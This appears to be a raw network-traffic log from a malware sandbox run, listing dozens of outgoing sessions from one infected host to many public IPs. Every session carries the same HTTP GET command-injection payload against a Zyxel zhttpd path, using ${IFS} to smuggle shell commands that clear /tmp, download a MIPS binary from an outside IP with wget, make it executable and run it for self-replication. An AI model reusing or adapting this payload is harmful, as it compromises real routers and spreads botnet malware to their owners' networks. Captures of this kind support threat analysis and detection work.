                                                Jan 12, 2024 18:24:43.037014961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6175192.168.2.1359346154.145.161.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037070036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6176192.168.2.133503643.174.222.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037094116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6177192.168.2.133844499.141.253.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037122011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6178192.168.2.136015083.136.187.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037151098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6179192.168.2.1354242102.68.0.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037189007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6180192.168.2.1340040154.179.240.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037250042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6181192.168.2.1359210128.128.243.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037280083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6182192.168.2.1336358114.106.108.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037312031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6183192.168.2.1360426110.143.20.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037359953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6184192.168.2.1343162124.26.14.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037381887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6185192.168.2.135565241.63.112.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037424088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6186192.168.2.1350202180.147.178.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037455082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6187192.168.2.1347660147.59.37.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037506104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6188192.168.2.134515070.85.136.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037518978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6189192.168.2.1346094131.30.124.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037566900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6190192.168.2.1350364201.15.79.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037621975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6191192.168.2.133331841.122.51.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037643909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192192.168.2.1350150162.221.189.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037682056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6193192.168.2.135009057.167.156.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037713051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6194192.168.2.1339556102.241.23.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037760973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6195192.168.2.1337256210.204.215.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037792921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6196192.168.2.1360502109.244.32.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037811041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6197192.168.2.1354898157.50.173.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037847042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6198192.168.2.1354020213.47.21.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037898064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6199192.168.2.1341084183.238.179.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037942886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6200192.168.2.133915613.234.203.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.037985086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6201192.168.2.1353680101.149.177.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038024902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6202192.168.2.135604843.5.248.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038034916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6203192.168.2.133605217.130.238.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038121939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6204192.168.2.1347364138.169.229.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038141966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6205192.168.2.1343940110.139.173.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038172007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6206192.168.2.1348860176.134.124.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038222075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6207192.168.2.1357406111.234.80.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038284063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6208192.168.2.1335162220.11.174.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038311005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6209192.168.2.134329866.194.188.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038400888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6210192.168.2.1335128152.106.70.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038434982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6211192.168.2.1351500222.131.229.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038469076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6212192.168.2.135566293.153.202.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038484097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6213192.168.2.133994072.107.227.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038549900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6214192.168.2.136098679.208.192.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038583994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6215192.168.2.134991054.59.94.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038631916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6216192.168.2.1355578205.49.121.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038676977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6217192.168.2.1334254145.147.2.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038705111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6218192.168.2.135970261.84.11.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038733959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6219192.168.2.1337162128.33.167.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038779974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6220192.168.2.1347806155.129.32.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038806915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6221192.168.2.135847867.211.114.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038878918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6222192.168.2.1353150196.11.214.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038902998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6223192.168.2.135446274.57.155.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038928032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6224192.168.2.135404249.48.190.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.038965940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6225192.168.2.1354270138.183.128.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039022923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6226192.168.2.1337536183.2.55.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039052010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6227192.168.2.1336246113.141.60.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039102077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6228192.168.2.1334582142.24.142.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039148092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6229192.168.2.1343398195.4.98.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039189100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6230192.168.2.134254044.194.43.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039202929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6231192.168.2.1347492143.102.35.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039243937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6232192.168.2.134231036.251.158.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039305925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6233192.168.2.1344174158.101.49.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039359093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6234192.168.2.134892490.227.142.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039383888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6235192.168.2.134032836.208.170.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039438009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6236192.168.2.136047057.173.168.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039460897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6237192.168.2.1340892145.41.244.241443
                                                TimestampBytes transferredDirectionData
